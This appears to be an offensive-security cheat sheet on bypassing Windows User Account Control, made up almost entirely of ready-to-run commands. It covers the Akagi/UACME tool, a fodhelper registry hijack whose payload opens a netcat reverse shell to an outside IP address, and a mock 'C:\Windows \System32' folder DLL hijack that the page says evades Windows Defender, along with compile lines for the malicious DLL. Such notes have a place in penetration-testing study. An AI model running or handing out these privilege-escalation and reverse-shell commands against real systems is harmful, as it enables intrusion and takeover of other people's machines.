UAC Bypass
UACME
Akagi-UACME will %99 be a win here
akagi64 61 c:\windows\system32\cmd.exe
Technique 1
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'c:\users\morph3\nc.exe -e cmd.exe 10.10.10.33 443' -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
Now simply type "fodhelper" and you should have the shell.
To undo this,
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
Technique 2
This technique is pretty solid and does not get detected by the windows defender
TLDR; you can fool windows by creating a folder called c:\windows \System32\
you can put a windows binary(auto elevated ones) there and hijack dlls. There is a full list of hijackable binaries here,
mkdir "C:\Windows \"
mkdir "C:\Windows \System32\"
copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe"
copy ".\morph.dll" "C:\Windows \System32\Secur32.dll"
"C:\Windows \System32\computerdefaults.exe"
You might need to compile your binary in 64bit arch
# x64
x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp
# x86
i686-w64-mingw32-gcc -shared -o test-x86.dll test.cpp
Last updated